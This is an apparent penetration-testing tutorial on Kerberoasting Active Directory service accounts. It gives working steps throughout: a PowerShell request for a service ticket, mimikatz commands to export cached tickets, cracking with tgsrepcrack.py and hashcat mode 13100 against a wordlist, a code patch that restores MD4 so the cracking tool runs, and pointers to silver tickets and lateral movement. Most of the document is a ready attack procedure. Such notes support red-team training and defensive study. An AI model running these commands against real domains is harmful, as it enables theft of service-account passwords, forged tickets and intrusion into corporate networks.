The goal of Kerberoasting is to obtain and crack a Kerberos service ticket (TGS, also called a service ticket or ST) in order to recover the service account's encryption key, which is used to encrypt every service ticket issued for that service. With the service key, the attacker can create a silver ticket.

Goal

Obtain and crack a TGS/ST to recover the service account's secret key / password.

krbtgt's password can sometimes also be cracked

If the Windows server has lived long enough to have gone through an upgrade from Windows Server 2000 to Windows Server 2003, the krbtgt account could still be using a crackable password. WS2000 does not enforce strong password requirements, whereas WS2003 (and above) automatically generates a very strong password for krbtgt. However, the upgrade from WS2000 to WS2003 does not force the krbtgt key to be regenerated.

Obtain TGS

We start by using KerberosRequestorSecurityToken to request a service ticket:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com'

  • Optional: use klist to list all Kerberos tickets currently cached for the current user and confirm that the ST is among them.
  • It is also possible to use GetUserSPNs.py (part of the impacket example scripts, see /usr/share/impacket) to obtain the TGS remotely.

After requesting a ticket, use mimikatz to dump the ticket:

.\mimikatz.exe "kerberos::list /export" exit

Automate with Invoke-Kerberoast.ps1

The above steps can be done in a single step with Invoke-Kerberoast.ps1, which enumerates all SPNs, requests STs, and dumps all cached tickets automatically.

Brute-force TGS for encryption key

Use the kerberoast package to brute-force the ticket for the encryption key (i.e. the service account's password):

/usr/share/kerberoast/tgsrepcrack.py wordlist.txt TGS.kirbi

NTLM/MD4 is disabled

In newer versions of Python, NTLM/MD4 is disabled in hashlib by default, so a workaround is needed to make it work. First install the pycryptodome package through pip, then patch ntlmhash() in kerberos.py as follows:

def ntlmhash(s):
    # Use pycryptodome's MD4 instead of hashlib, which no longer exposes MD4 by default.
    from Crypto.Hash import MD4
    # The NT hash is MD4 over the UTF-16LE encoding of the password.
    md4 = MD4.new()
    md4.update(s.encode('utf-16le'))
    return md4.digest()

Alternatives

hashcat and John the Ripper can also be used, e.g. hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -O (mode 13100 is Kerberos 5 TGS-REP etype 23, i.e. RC4-HMAC).

This doesn't always work!

Kerberoasting is infeasible if the target account is a managed or group managed service account (MSA/gMSA), which has a 120-character password.

What’s Next?

Lateral Movement

This attack enables lateral movement if the service account is a domain admin or a local administrator on any domain-joined machine.

Modifying the Service Ticket

By cracking the service password, the attacker can forge a service ticket (a silver ticket) that grants maximum privileges on the service principal.